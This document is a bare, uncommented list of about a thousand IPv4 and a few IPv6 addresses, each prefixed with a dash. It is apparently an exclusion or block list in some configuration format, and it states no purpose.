-185.76.77.102 -2a0a:7d80:1:7::97:2fa -107.163.113.184 -192.186.129.38 -31.148.220.125 -69.87.192.54 -174.138.169.26 -123.207.249.65 -165.225.132.240 -198.110.131.170 -156.237.176.205 -185.25.116.155 -173.243.125.56 -23.230.224.172 -62.210.87.28 -137.74.35.42 -185.171.1.7 -178.62.111.210 -37.188.116.247 -104.156.249.16 -110.172.214.83 -103.240.214.169 -61.19.246.169 -104.236.173.117 -47.90.103.240 -66.232.146.99 -49.212.191.181 -103.240.212.60 -178.32.5.42 -222.222.120.250 -188.225.33.154 -23.224.115.143 -178.18.89.212 -23.229.12.173 -156.235.169.21 -128.199.183.72 -212.101.96.124 -23.225.95.181 -45.120.29.42 -172.252.10.208 -192.99.219.219 -217.150.94.126 -223.72.254.140 -122.114.44.25 -186.1.182.118 -198.143.186.39 -107.163.113.177 -169.54.163.155 -89.25.214.197 -133.242.231.92 -159.89.158.175 -217.13.93.65 -50.31.4.113 -93.159.186.104 -27.254.146.213 -23.253.5.11 -103.240.212.245 -118.178.190.86 -103.205.1.67 -5.145.174.151 -216.224.117.31 -96.8.125.103 -107.163.113.63 -172.102.197.169 -178.32.190.47 -93.191.132.57 -118.31.74.124 -117.78.37.20 -37.59.213.95 -128.199.201.246 -193.16.154.9 -172.246.220.131 -138.68.53.180 -188.166.104.29 -107.178.147.100 -23.104.135.97 -125.253.123.23 -43.230.202.109 -140.143.135.117 -180.178.44.37 -62.213.100.247 -138.197.201.218 -115.125.176.110 -82.135.148.44 -83.148.192.26 -103.100.157.123 -74.82.176.2 -107.170.229.167 -113.196.233.196 -50.115.227.37 -173.252.203.195 -139.162.151.246 -103.205.145.42 -5.153.253.79 -107.173.11.238 -92.43.113.70 -216.224.117.118 -45.76.42.105 -176.114.237.75 -115.29.230.41 -68.171.211.93 -103.12.49.31 -69.60.109.48 -195.151.230.167 -43.230.200.50 -139.129.109.210 -122.183.102.69 -119.63.86.75 -27.50.91.69 -5.61.47.113 -109.237.212.108 -133.242.210.139 -45.252.250.231 -120.25.250.156 -103.244.1.76 -137.74.59.192 -104.207.52.96 -219.147.21.124 -54.184.80.90 -45.117.81.168 -192.250.225.103 -92.63.86.137 -46.101.34.165 -191.255.245.182 -50.23.130.154 -108.178.45.85 -2a0a:7d80:1:7::95:1d9 -101.200.205.18 -45.61.113.52 -119.28.136.165 -112.74.241.111 -176.56.62.23 -189.17.100.38 -47.90.79.97 -119.81.29.189 -107.161.169.163 -45.124.64.225 -106.185.49.28 -37.252.102.62 -106.112.250.131 -116.62.125.245 -45.114.94.81 -103.240.212.229 -27.120.120.12 -121.43.157.218 -98.124.176.174 -119.28.143.225 -43.230.202.196 -45.114.94.206 -153.126.164.34 -188.166.38.228 -104.245.102.31 -49.212.223.172 -142.4.119.83 -213.136.79.182 -94.177.40.250 -23.225.95.36 -67.227.209.64 -2a0a:7d80:1:7::104:eb -153.126.213.168 -209.126.106.59 -136.0.69.86 -23.23.220.50 -212.227.106.40 -192.210.212.28 -23.225.89.109 -182.92.176.81 -111.118.205.146 -120.92.226.231 -106.14.113.244 -81.31.38.13 -199.231.211.10 -162.243.21.142 -114.80.116.142 -95.172.20.138 -171.113.100.89 -104.225.219.74 -200.155.159.196 -66.55.156.156 -115.29.5.88 -69.16.215.196 -198.74.116.67 -120.27.148.144 -122.13.138.200 -188.253.9.170 -74.82.170.98 -27.254.146.204 -221.122.79.34 -178.62.115.104 -109.237.211.121 -178.22.66.177 -166.62.53.185 -103.37.232.82 -173.212.246.75 -103.205.1.109 -2a0a:7d80:1:7::92:8f -139.199.220.140 -210.142.80.54 -13.211.59.167 -172.255.173.249 -66.39.32.79 -75.98.175.48 -35.153.61.150 -121.127.248.54 -172.107.64.56 -192.99.152.79 -46.231.207.64 -121.42.251.57 -103.240.214.208 -91.221.206.114 -202.168.148.75 -5.135.108.211 -111.13.138.211 -198.154.214.154 -202.150.150.54 -162.243.243.204 -118.193.204.150 -103.12.51.39 -172.252.10.228 -67.225.236.45 -88.248.166.115 -89.145.103.140 -119.29.121.200 -200.105.149.26 -98.126.17.75 -221.207.164.36 -103.27.210.75 -115.29.38.129 -85.254.126.36 -103.53.197.97 -202.146.208.181 -185.104.152.155 -192.162.136.33 -5.145.174.71 -169.47.215.111 -142.44.202.73 -107.180.84.78 -219.94.254.157 -64.237.59.198 -172.255.173.74 -89.40.119.164 -120.26.216.116 -107.179.95.24 -195.12.186.122 -142.4.119.119 -103.90.227.129 -194.152.35.115 -45.55.37.231 -103.208.35.217 -194.145.208.232 -207.182.135.194 -104.202.185.150 -113.88.248.134 -149.56.184.137 -23.225.95.26 -93.190.41.109 -45.77.54.178 -50.22.189.39 -66.70.150.213 -64.237.48.188 -46.101.135.115 -123.57.254.232 -103.240.215.60 -43.230.200.114 -82.201.41.17 -103.37.149.40 -103.9.76.213 -172.246.220.155 -162.250.124.75 -89.208.236.228 -45.41.92.183 -182.16.8.165 -162.251.110.162 -185.14.184.17 -65.175.104.241 -178.255.100.230 -199.87.233.62 -72.55.139.45 -120.24.54.94 -86.110.45.234 -107.170.16.225 -23.95.242.163 -80.233.244.91 -104.236.231.57 -45.114.124.32 -195.246.99.165 -166.62.91.250 -185.4.48.108 -103.22.180.167 -119.145.168.29 -23.225.89.245 -153.122.12.107 -5.135.186.56 -116.62.34.112 -39.108.49.69 -103.240.215.43 -99.192.209.78 -23.225.95.88 -45.61.115.37 -101.37.171.34 -103.240.215.110 -119.29.251.198 -64.118.94.198 -118.96.174.85 -176.28.51.82 -103.104.204.254 -117.18.15.44 -208.43.235.71 -43.230.201.151 -222.73.180.183 -202.171.225.106 -212.94.129.131 -109.124.81.130 -23.110.61.71 -192.250.225.111 -107.179.93.52 -200.62.3.45 -67.229.73.103 -67.205.117.102 -192.99.249.76 -125.5.112.210 -23.250.115.126 -104.202.185.26 -139.199.71.15 -103.240.213.117 -183.26.171.7 -216.224.117.66 -167.114.61.160 -199.167.40.65 -217.174.148.40 -199.101.145.77 -176.31.55.129 -23.89.199.244 -120.27.152.250 -210.184.202.120 -175.45.136.64 -50.115.137.199 -103.235.237.120 -109.238.11.82 -193.224.41.174 -120.25.226.89 -168.235.94.218 -153.126.206.22 -144.217.108.211 -93.190.40.198 -188.225.33.125 -109.95.210.65 -162.144.59.220 -45.42.94.156 -122.9.22.130 -156.237.178.149 -5.56.60.81 -185.146.87.134 -172.107.75.229 -165.227.97.78 -172.255.173.20 -106.15.37.252 -192.237.180.163 -212.68.42.207 -172.255.173.191 -103.244.1.215 -125.88.168.209 -98.126.92.54 -114.215.178.187 -195.182.132.102 -120.55.86.197 -202.216.15.183 -47.97.215.90 -213.131.229.27 -144.202.116.239 -212.83.134.72 -182.253.203.131 -216.17.111.153 -146.71.98.229 -115.159.33.82 -104.238.111.5 -142.4.107.122 -99.192.143.100 -91.229.23.78 -103.205.0.80 -209.190.65.8 -185.50.198.34 -211.149.185.202 -104.207.50.81 -62.210.72.176 -97.107.136.116 -204.93.61.121 -208.117.47.250 -123.207.169.253 -195.154.52.75 -51.254.93.89 -88.85.81.109 -202.75.221.157 -120.24.16.30 -172.104.60.42 -195.191.235.25 -182.16.34.98 -103.240.215.79 -58.216.245.206 -162.243.240.244 -103.240.213.49 -49.212.188.99 -104.236.245.91 -114.55.232.104 -23.225.0.6 -175.122.253.14 -133.242.5.232 -108.163.161.139 -192.151.247.202 -62.210.138.93 -216.172.173.152 -104.245.102.48 -54.92.70.61 -88.85.79.214 -193.19.118.101 -118.238.21.41 -192.186.143.253 -177.85.100.200 -142.4.107.79 -212.129.43.222 -49.212.63.58 -109.237.211.148 -62.84.240.225 -150.95.202.173 -104.140.247.200 -45.114.94.24 -142.91.232.66 -91.230.193.229 -185.129.248.16 -183.134.4.151 -77.108.78.13 -142.91.95.145 -45.114.94.121 -138.219.231.131 -68.171.211.119 -194.28.175.23 -23.253.201.123 -119.23.33.116 -155.232.40.170 -172.255.173.51 -46.105.172.241 -139.59.111.97 -43.230.202.6 -115.125.176.135 -89.108.87.82 -138.128.144.194 -54.37.190.36 -172.106.186.21 -67.225.134.51 -23.225.0.54 -91.191.145.157 -193.42.142.137 -120.77.10.90 -103.28.38.224 -103.235.253.211 -104.202.185.226 -103.231.56.141 -23.225.0.234 -119.29.52.234 -119.90.63.51 -184.164.139.23 -172.247.51.38 -183.246.77.71 -183.131.231.132 -222.124.4.116 -43.230.200.238 -118.190.44.203 -188.116.4.53 -103.240.104.211 -195.16.112.70 -2a0a:7d80:1:7::105:3b0 -192.36.0.131 -142.91.243.91 -128.14.93.251 -69.13.210.170 -59.90.200.3 -23.225.113.29 -142.91.232.122 -209.58.129.101 -101.200.104.34 -202.131.101.166 -74.82.181.244 -43.230.202.171 -89.43.65.27 -185.122.140.58 -45.118.112.12 -112.74.114.37 -209.250.225.7 -120.24.82.236 -122.114.160.151 -23.225.239.167 -37.58.17.138 -2a0a:7d80:1:7::92:e9 -162.247.232.91 -65.60.46.156 -103.240.212.92 -107.164.66.165 -128.199.161.1 -60.12.69.116 -43.230.201.244 -108.61.223.197 -104.247.202.3 -80.240.130.81 -115.249.4.68 -86.104.177.66 -77.93.212.106 -107.178.149.92 -160.16.197.28 -169.50.170.198 -27.118.26.7 -91.224.141.160 -23.111.164.82 -74.206.240.43 -120.25.246.25 -175.107.15.158 -43.230.200.14 -202.46.1.125 -218.56.48.53 -106.186.113.47 -104.232.75.172 -120.78.223.85 -180.101.45.27 -5.135.224.58 -118.89.50.186 -149.202.221.52 -155.94.69.197 -184.95.53.30 -64.22.68.189 -41.189.186.156 -160.16.130.21 -37.60.242.11 -173.254.252.183 -93.186.179.92 -119.29.110.84 -172.107.147.30 -193.142.158.114 -125.212.224.168 -182.254.218.199 -104.236.151.104 -103.27.178.21 -195.42.183.39 -123.59.42.28 -23.225.95.158 -85.254.126.64 -114.215.241.82 -114.55.132.246 -96.50.25.41 -23.230.224.250 -23.225.89.114 -120.25.210.43 -153.126.193.134 -79.99.164.133 -75.127.11.214 -37.255.249.233 -69.87.199.5 -103.240.214.207 -51.254.5.197 -192.162.24.38 -184.169.138.239 -79.98.104.144 -5.178.109.205 -72.14.190.20 -209.53.155.216 -176.221.41.9 -89.202.46.183 -185.89.204.12 -139.162.32.238 -103.6.192.101 -139.99.104.159 -107.180.85.28 -121.41.38.214 -91.221.70.245 -37.34.52.75 -86.105.32.11 -23.225.95.34 -67.229.63.102 -2a0a:7d80:1:7::104:47 -37.153.109.56 -198.24.163.233 -58.64.175.158 -119.23.234.167 -101.200.159.225 -5.149.253.48 -2a0a:7d80:1:7::94:6e -43.243.249.42 -172.107.165.40 -5.135.58.121 -69.12.68.37 -85.214.245.251 -205.185.115.98 -101.200.177.105 -66.70.223.75 -5.145.175.159 -5.39.87.108 -5.135.58.83 -101.37.71.142 -209.236.119.82 -23.244.241.125 -114.240.221.80 -2a03:4000:6:707b::8 -13.112.55.166 -87.237.205.31 -81.92.6.7 -123.56.12.78 -122.193.22.133 -121.40.248.160 -162.209.0.179 -128.65.126.51 -5.189.171.52 -133.242.53.193 -77.93.197.185 -174.37.247.109 -209.200.13.200 -188.166.193.43 -194.135.81.186 -217.182.120.209 -198.50.227.166 -85.17.235.76 -178.32.215.195 -41.211.127.219 -147.135.197.12 -120.77.34.106 -45.32.47.188 -43.252.173.26 -60.51.218.194 -43.249.8.98 -60.205.7.75 -165.231.3.222 -139.59.11.158 -74.206.240.109 -39.108.58.142 -104.195.10.54 -218.56.178.26 -172.246.196.19 -172.107.146.155 -104.232.102.181 -60.165.160.45 -82.94.245.152 -45.35.102.144 -150.95.154.151 -111.223.52.168 -109.239.52.119 -67.196.55.167 -68.171.211.68 -217.23.11.154 -91.229.23.90 -77.75.98.10 -122.114.34.72 -122.114.94.41 -82.135.148.14 -123.207.118.224 -123.56.251.72 -103.55.27.123 -91.229.23.117 -216.224.117.190 -219.94.243.66 -221.230.196.98 -134.119.35.253 -218.32.216.147 -219.94.193.192 -104.202.185.243 -104.236.53.19 -167.114.11.84 -154.16.127.86 -45.63.75.102 -212.13.97.56 -64.207.181.70 -185.104.152.233 -65.60.43.171 -185.104.152.111 -64.22.68.244 -107.150.37.229 -64.237.44.169 -23.225.113.204 -115.29.163.32 -94.101.83.158 -115.125.176.18 -103.240.212.97 -103.240.214.167 -82.135.151.37 -159.148.37.113 -121.40.16.233 -5.188.204.103 -43.229.39.22 -47.94.154.55 -45.55.219.137 -217.199.160.95 -91.134.203.185 -156.237.177.168 -84.39.37.231 -23.111.148.107 -45.117.81.194 -74.206.240.96 -172.107.71.61 -185.76.77.134 -120.24.233.77 -151.80.88.229 -1.234.82.16 -120.76.201.81 -120.92.236.132 -168.235.104.117 -93.190.141.14 -168.235.64.160 -162.248.208.200 -203.171.239.99 -138.197.131.4 -123.207.91.183 -80.179.92.148 -72.55.163.173 -182.161.78.47 -104.247.202.12 -198.154.222.129 -220.180.207.101 -2a0a:7d80:1:7::93:c5 -42.112.30.96 -101.200.85.209 -173.252.249.182 -193.151.90.125 -5.178.109.121 -159.65.174.47 -112.91.27.55 -114.6.21.40 -216.224.117.219 -160.16.215.184 -223.223.195.142 -139.99.117.49 -142.91.232.114 -69.64.92.234 -51.15.52.178 -45.33.105.224 -54.243.192.165 -185.50.196.96 -162.243.100.231 -74.82.185.197 -198.50.213.69 -52.52.235.212 -34.207.220.214 -103.98.112.253 -203.77.250.245 -133.242.199.146 -192.241.134.32 -163.172.56.222 -202.164.19.105 -45.76.166.188 -188.165.187.169 -139.162.39.109 -166.63.21.23 -45.32.45.96 -67.229.58.245 -172.255.159.235 -23.224.115.84 -104.221.169.2 -202.146.208.180 -115.159.72.98 -185.50.197.88 -199.119.137.180 -54.210.4.3 -182.16.27.61 -185.87.123.7 -50.115.130.139 -119.183.132.143 -218.244.145.35 -112.74.64.193 -123.56.101.77 -107.170.40.168 -160.16.111.97 -162.144.38.158 -194.145.209.132 -37.75.12.201 -43.230.202.122 -104.202.185.217 -51.254.150.115 -93.104.211.19 -201.76.173.90 -172.102.197.164 -184.175.71.204 -119.29.185.191 -23.225.95.113 -123.56.30.71 -47.92.92.147 -115.125.176.124 -211.159.188.196 -103.240.214.50 -185.129.248.118 -85.214.117.109 -103.240.215.13 -172.106.187.235 -172.252.10.201 -23.225.0.173 -91.224.194.252 -158.69.98.101 -178.238.232.184 -47.95.32.188 -104.202.185.153 -103.240.212.202 -172.255.159.197 -174.143.26.52 -51.255.200.254 -2a0a:7d80:1:7::102:2ac -216.107.153.216 -39.108.53.60 -121.40.183.17 -145.239.71.59 -121.41.41.212 -94.102.56.147 -85.254.126.90 -60.205.7.211 -47.98.58.77 -172.255.173.108 -52.80.60.185 -43.230.203.108 -67.198.134.162 -222.79.40.173 -172.107.147.11 -27.254.146.113 -199.119.139.102 -128.199.106.87 -107.161.173.107 -75.126.200.214 -160.16.113.51 -149.202.251.138 -169.1.20.43 -188.210.221.13 -193.232.45.120 -172.255.159.217 -159.65.5.177 -182.61.40.139 -94.198.100.174 -118.190.102.173 -43.230.200.179 -219.138.205.254 -120.76.239.120 -47.94.40.160 -122.225.96.81 -185.12.111.182 -106.14.45.176 -115.125.176.194 -199.168.189.5 -198.74.53.25 -192.169.143.163 -96.47.234.58 -34.217.85.36 -91.134.151.90 -120.26.36.140 -45.125.236.135 -122.227.43.194 -5.178.109.138 -47.254.32.39 -23.238.129.120 -116.62.219.137 -103.10.189.47 -142.91.243.93 -137.118.45.13 -104.203.82.248 -166.78.27.39 -120.79.174.101 -128.199.64.60 -198.13.122.227 -43.230.201.215 -220.181.86.31 -158.69.14.152 -43.230.203.106 -185.129.248.125 -172.255.159.238 -1.53.252.130 -65.60.5.67 -120.55.13.6 -83.137.53.185 -174.37.242.41 -23.225.239.27 -172.107.73.240 -70.167.240.116 -160.16.115.101 -198.27.77.238 -185.28.38.66 -118.190.115.56 -157.255.231.145 -142.91.232.94 -203.177.109.6 -210.140.215.198 -94.46.177.111 -95.168.209.1 -176.223.197.45 -108.61.189.121 -222.143.53.68 -209.164.87.160 -203.137.39.86 -104.131.161.47 -120.77.183.176 -103.93.179.210 -156.235.168.55 -198.98.101.33 -92.63.99.156 -43.225.159.141 -172.252.10.192 -114.55.24.23 -43.230.202.126 -115.29.223.197 -31.171.249.86 -46.105.54.61 -200.206.61.122 -31.41.46.30 -118.244.226.155 -216.17.109.102 -185.92.245.91 -119.136.145.143 -202.44.60.230 -172.246.196.136 -115.125.176.9 -185.66.173.229 -47.90.88.59 -37.252.96.97 -222.185.236.50 -178.32.178.126 -103.249.104.170 -23.225.95.33 -45.252.248.222 -173.224.116.245 -174.139.6.150 -81.2.243.130 -184.168.147.196 -45.35.99.151 -114.215.183.151 -120.24.152.149 -185.82.222.8 -182.18.159.55 -58.222.24.163 -94.237.34.69 -103.193.241.147 -113.31.134.226 -194.39.84.58 -149.56.113.180 -2a0a:7d80:1:7::100:35d -106.14.38.207 -122.9.15.54 -78.140.184.114 -50.22.9.53 -195.56.241.52 -103.240.212.192 -149.255.152.39 -198.24.151.118 -104.202.185.106 -75.126.79.42 -43.230.201.235 -212.150.209.244 -13.250.112.59 -217.150.94.111 -200.113.108.93 -70.32.95.64 -188.210.220.21 -212.51.208.167 -106.14.6.163 -104.232.102.178 -172.246.220.18 -103.243.247.94 -114.243.232.195 -23.225.113.122 -39.108.1.211 -68.169.48.82 -43.230.202.211 -107.6.132.6 -23.88.238.136 -158.69.131.221 -54.189.224.78 -209.141.54.239 -186.202.182.235 -14.29.82.234 -91.191.145.156 -178.33.185.29 -54.229.0.177 -202.146.241.52 -222.43.97.214 -173.255.230.177 -212.48.92.126 -13.112.100.170 -204.155.31.197 -58.249.116.108 -128.199.249.137 -156.237.179.124 -142.4.103.99 -87.98.250.50 -156.237.177.187 -198.37.112.193 -195.42.160.53 -210.5.46.75 -103.49.214.116 -62.133.161.102 -109.237.211.238 -156.67.216.179 -64.22.68.46 -185.4.48.101 -202.157.183.120 -172.255.173.195 -66.34.237.113 -47.100.167.167 -74.205.86.210 -107.163.113.152 -171.244.8.88 -82.223.19.108 -192.64.72.165 -50.22.198.218 -23.244.241.67 -150.95.180.203 -66.85.175.12 -160.16.126.193 -45.35.102.175 -185.153.220.206 -216.224.117.119 -209.200.23.124 -50.22.189.33 -91.210.190.98 -185.191.229.6 -116.196.96.6 -69.30.55.149 -185.117.172.35 -45.76.160.29 -109.237.212.173 -114.108.128.98 -210.14.146.197 -103.40.160.41 -222.32.71.249 -111.202.15.45 -114.215.87.120 -54.183.180.81 -199.231.93.121 -103.22.180.166 -43.230.202.238 -123.57.175.105 -115.29.208.103 -172.246.196.196 -198.199.113.56 -162.252.57.40 -104.202.185.32 -203.171.237.159 -153.121.46.59 -149.202.98.91 -103.227.129.74 -50.116.106.174 -178.33.139.255 -125.212.227.84 -204.44.66.17 -217.144.143.84 -46.166.134.132 -23.110.56.112 -103.7.59.91 -76.74.184.41 -103.84.194.156 -209.200.43.171 -66.135.36.209 -115.125.176.23 -67.225.172.108 -198.20.232.169 -216.224.117.248 -134.119.174.79 -222.73.129.35 -109.196.41.218 -103.237.145.149 -46.101.248.218 -47.93.84.189 -104.221.169.11 -192.3.90.14 -147.75.64.57 -14.29.35.22 -80.93.213.37 -45.55.139.139 -156.235.171.52 -202.171.225.114 -185.50.197.150 -27.126.190.15 -93.115.31.32 -2a0a:7d80:1:7::97:270 -43.241.48.172 -95.211.149.108 -115.125.176.14 -177.43.222.14 -113.196.75.43 -170.75.152.171 -54.196.160.0 -149.56.174.80 -64.131.74.151 -182.253.117.59 -128.199.215.169 -151.11.213.22 -172.87.26.73 -173.236.78.80 -120.197.42.175 -103.240.214.14 -71.19.249.109 -217.150.94.81 -103.242.106.113 -192.186.173.250 -119.29.103.22 -37.139.21.186 -186.226.183.229 -185.94.191.100 -149.202.111.147 -182.92.165.114 -45.76.158.6 -2a0a:7d80:1:7::92:206 -133.242.195.157 -79.98.105.132 -51.255.84.212 -27.254.146.16 -209.141.56.19 -36.99.244.204 -222.186.15.231 -176.31.39.138 -103.12.50.53 -207.198.103.201 -49.212.137.23 -5.145.175.50 -112.74.208.27 -123.56.89.166 -115.231.216.138 -108.61.60.44 -23.94.43.117 -198.58.106.93 -195.248.234.199 -85.17.235.77 -107.178.162.67 -194.19.246.41 -43.230.201.102 -23.110.47.243 -216.107.153.172 -47.94.238.219 -124.207.234.134 -115.29.246.111 -80.82.117.143 -23.225.113.7 -58.46.125.9 -91.121.76.111 -172.107.71.34 -49.50.77.52 -203.114.74.107 -43.230.200.177 -47.100.12.230 -104.131.39.146 -213.79.2.17 -193.42.142.142 -5.189.150.196 -217.12.33.14 -156.235.168.49 -202.84.42.46 -173.252.194.128 -38.83.102.146 -45.117.80.94 -45.114.118.172 -111.231.209.24 -58.246.82.115 -210.1.3.54 -45.42.94.143 -23.225.95.249 -119.23.42.195 -107.179.95.242 -164.70.8.97 -103.240.213.154 -120.78.67.10 -45.114.94.43 -119.76.18.120 -93.115.31.74 -50.22.189.45 -104.224.192.165 -185.129.248.75 -142.4.119.95 -103.4.18.158 -182.72.22.145 -34.245.35.26 -103.240.212.217 -208.110.80.28 -172.247.51.163 -103.100.157.188 -206.12.25.25 -194.231.246.131 -217.61.128.88 -66.63.184.147 -23.227.133.237 -172.247.51.21 -95.62.105.126 -173.252.197.120 -88.212.235.188 -167.114.56.9 -2a0a:7d80:1:7::97:39 -120.24.246.6 -175.122.253.7 -5.145.175.23 -178.20.232.239 -125.76.226.210 -122.9.22.136 -94.176.238.116 -92.115.237.171 -37.48.77.132 -150.95.104.102 -103.58.148.18 -23.247.10.181 -177.234.150.124 -94.184.211.82 -104.250.154.250 -144.217.93.204 -103.198.45.55 -158.69.222.72 -204.27.59.137 -2600:3c03::f03c:91ff:feae:f475 -112.74.33.233 -103.6.53.70 -107.190.235.66 -67.205.134.144 -208.43.127.134 -203.153.120.28 -89.111.16.214 -178.255.100.189 -67.55.65.20 -134.119.172.20 -202.84.40.216 -149.56.36.206 -185.12.111.188 -64.22.68.243 -217.18.43.115 -180.214.164.73 -120.197.56.171 -104.202.185.241 -172.104.191.38 -37.153.91.114 -114.215.181.207 -107.189.161.86 -74.207.244.150 -216.245.210.202 -60.28.24.202 -172.247.51.237 -122.114.43.204 -160.16.56.25 -107.180.76.170 -183.181.168.160 -101.251.192.48 -91.191.157.8 -217.182.82.151 -112.140.185.206 -173.193.149.97 -120.26.168.156 -78.24.216.28 -120.26.98.167 -43.230.201.117 -206.190.153.4 -174.137.155.166 -218.244.148.231 -103.240.214.65 -208.73.1.74 -87.121.0.132 -39.106.216.173 -91.237.70.28 -172.97.101.120 -106.15.103.41 -198.199.84.139 -23.238.176.196 -184.154.216.40 -112.175.238.101 -49.51.135.122 -85.248.158.164 -103.100.157.229 -5.135.58.109 -35.187.200.58 -107.182.231.121 -47.90.102.36 -209.59.174.48 -104.232.75.173 -103.35.151.120 -172.255.173.180 -107.163.113.7 -5.149.252.53 -209.188.24.13 -212.68.42.16 -158.69.204.66 -45.61.112.35 -2a0a:7d80:1:7::97:55 -54.247.4.165 -43.230.200.211 -50.31.99.142 -37.247.103.189 -60.205.105.231 -118.184.38.136 -115.125.176.76 -103.100.157.164 -185.149.103.220 -94.23.3.187 -185.13.58.44 -59.106.191.32 -168.235.86.169 -172.255.173.219 -223.4.208.229 -47.88.0.22 -150.95.185.239 -133.130.97.151 -23.225.89.131 -199.182.171.112 -107.170.18.86 -120.25.249.223 -139.196.45.237 -203.13.40.13 -69.42.92.221 -43.230.202.251 -103.233.8.27 -180.178.62.5 -93.115.61.80 -23.104.135.119 -136.0.69.103 -142.4.200.66 -70.32.115.4 -122.114.17.3 -2a0a:7d80:1:7::96:113 -49.50.86.184 -136.243.174.190 -163.44.192.197 -149.210.244.168 -209.126.134.194 -95.85.51.74 -216.97.2.168 -182.254.228.150 -45.76.220.218 -46.105.129.134 -142.91.239.120 -63.238.52.93 -103.235.234.210 -156.237.178.156 -43.230.201.210 -5.135.224.35 -45.125.236.132 -119.23.160.238 -183.60.192.136 -185.69.52.104 -153.126.199.49 -47.93.200.120 -49.50.81.80 -92.243.27.205 -200.76.126.242 -198.199.111.41 -37.187.136.105 -216.17.106.10 -89.47.164.127 -137.74.214.134 -5.189.179.93 -77.81.120.150 -103.28.38.147 -58.87.100.211 -45.35.102.155 -193.84.64.130 -217.182.67.50 -176.123.8.195 -107.187.41.86 -198.55.102.87 -173.212.232.63 -202.6.17.140 -101.81.143.153 -95.173.184.53 -109.109.120.68 -120.92.232.50 -23.230.224.109 -43.230.202.255 -115.29.198.50 -172.255.173.189 -107.178.162.121 -146.185.129.35 -182.160.155.220 -77.104.165.216 -179.185.10.68 -198.100.147.143 -43.252.88.191 -54.154.19.211 -23.238.176.252 -160.16.104.251 -42.55.3.58 -94.23.12.206 -103.37.165.65 -60.170.29.154 -81.169.254.131 -173.198.193.82 -173.236.112.234 -23.230.224.24 -203.90.82.74 -50.23.255.237 -60.191.143.250 -209.141.36.221 -65.111.177.90 -178.172.161.18 -103.4.216.165 -172.246.196.186 -185.165.0.40 -139.129.222.120 -218.232.75.151 -67.222.12.168 -45.35.99.156 -156.67.217.128 -103.74.121.149 -158.39.77.130 -124.42.127.196 -121.12.120.162 -37.9.0.56 -46.17.40.125 -198.65.151.230 -61.67.218.211 -71.19.249.92 -216.17.100.112 -217.61.128.207 -162.243.1.149 -5.45.79.89 -211.149.187.132 -103.240.213.124 -157.255.231.143 -162.248.208.194 -103.197.70.87 -133.18.5.219 -185.89.206.25 -112.121.153.101 -23.88.82.94 -108.171.248.177 -2a01:e35:8ac5:1700:211:32ff:fe25:4307 -115.125.176.32 -104.202.185.7 -43.230.202.215 -172.246.220.111 -119.90.126.151 -103.24.0.174 -216.224.117.124 -116.196.80.2 -216.117.140.213 -101.201.79.34 -103.27.186.164 -185.66.140.194 -85.215.5.53 -23.95.90.195 -74.82.179.30 -62.212.32.151 -123.57.2.44 -205.186.144.134 -89.223.47.130 -5.189.170.253 -103.240.215.40 -115.28.163.155 -148.240.21.164 -192.169.249.207 -192.249.57.188 -45.32.106.93 -122.155.16.107 -156.235.171.136 -212.129.52.253 -185.145.253.54 -208.43.222.108 -34.213.233.105 -150.95.213.150 -202.100.179.216 -221.204.11.3 -142.91.95.175 -198.210.49.92 -107.160.163.212 -112.175.242.135 -204.74.211.50 -103.48.82.29 -34.253.186.49 -43.230.202.70 -103.205.1.75 -172.104.83.254 -64.131.79.224 -172.106.186.44 -188.125.166.38 -60.217.204.115 -122.114.46.46 -101.200.1.81 -45.79.128.199 -119.9.94.147 -103.16.140.18 -136.0.69.236 -187.50.235.120 -47.90.36.73 -115.28.212.252 -195.2.252.97 -133.242.128.178 -103.12.51.62 -91.238.103.81 -43.230.203.153 -160.16.105.159 -198.255.112.18 -5.178.109.175 -184.173.25.60 -49.212.137.194 -128.199.60.160 -185.12.92.214 -45.77.130.244 -98.126.0.52 -104.238.74.160 -27.254.153.235 -94.23.208.194 -153.121.34.239 -113.10.192.133 -141.138.195.192 -217.182.50.163 -112.74.69.202 -47.91.41.80 -130.105.45.69 -5.254.88.185 -113.71.137.103 -103.41.125.16 -198.199.102.97 -120.76.77.138 -138.68.60.245 -43.230.203.40 -104.203.82.152 -5.79.66.243 -146.71.99.180 -82.103.129.59 -104.245.102.45 -173.239.30.143 -43.230.201.232 -115.125.176.117 -5.9.32.173 -108.171.217.19 -198.200.41.109 -120.25.157.71 -104.131.148.148 -120.25.210.241 -109.169.76.64 -107.187.41.137 -116.213.132.3 -122.9.229.184 -185.4.48.105 -82.135.151.183 -176.9.16.4 -149.202.237.100 -104.245.102.20 -178.170.217.62 -147.135.220.139 -221.194.37.106 -112.74.204.108 -119.29.64.27 -107.170.18.37 -160.16.52.162 -45.77.44.29 -181.210.15.164 -50.115.137.38 -188.165.17.161 -115.28.90.203 -172.247.51.120 -123.207.146.200 -212.83.150.132 -69.16.215.195 -122.9.229.172 -160.16.100.5 -43.230.202.206 -80.233.244.60 -172.255.173.52 -23.88.82.173 -208.94.236.116 -144.168.69.155 -101.55.71.14 -192.102.6.236 -185.66.173.222 -43.230.200.86 -115.125.176.174 -103.231.14.89 -216.70.114.23 -23.110.56.92 -139.196.11.186 -156.67.217.10 -142.44.138.119 -172.110.10.227 -45.33.68.234 -173.198.193.86 -114.55.92.223 -88.214.242.99 -138.68.55.164 -198.210.42.79 -173.192.25.36 -185.50.199.118 -150.95.153.179 -137.74.33.172 -31.210.52.5 -208.115.127.44 -50.115.116.239 -62.128.111.250 -64.31.31.152 -88.99.177.101 -185.58.196.151 -43.230.203.180 -14.139.245.57 -184.164.139.28 -123.57.224.160 -64.237.59.205 -67.228.217.66 -137.74.11.196 -213.136.93.13 -195.8.206.137 -172.246.196.66 -103.56.193.15 -37.220.0.100 -124.235.74.166 -91.215.216.95 -195.210.46.252 -211.149.224.125 -139.196.19.121 -61.160.219.90 -43.230.203.5 -103.42.57.86 -124.239.242.152 -2a0a:7d80:1:9::99:2cb -133.242.150.222 -2a0a:7d80:1:7::94:e3 -119.81.140.149 -120.78.177.16 -184.168.134.201 -209.151.241.178 -155.133.131.50 -173.0.78.40 -47.90.46.130 -2a0a:7d80:1:7::91:15c -107.20.161.157 -83.96.153.33 -163.172.20.114 -69.57.242.37 -106.185.48.190 -218.241.141.52 -203.142.22.150 -47.92.28.158 -104.245.102.91 -209.200.41.150 -164.52.150.233 -107.186.35.105 -159.65.18.48 -54.206.82.203 -107.186.35.201 -217.23.154.44 -109.206.168.139 -123.232.116.210 -208.100.26.31 -121.41.88.177 -113.141.65.104 -217.150.94.120 -39.106.154.46 -199.15.206.39 -121.40.124.241 -212.71.245.93 -182.92.109.104 -185.122.140.86 -39.108.62.135 -172.104.168.166 -13.230.102.57 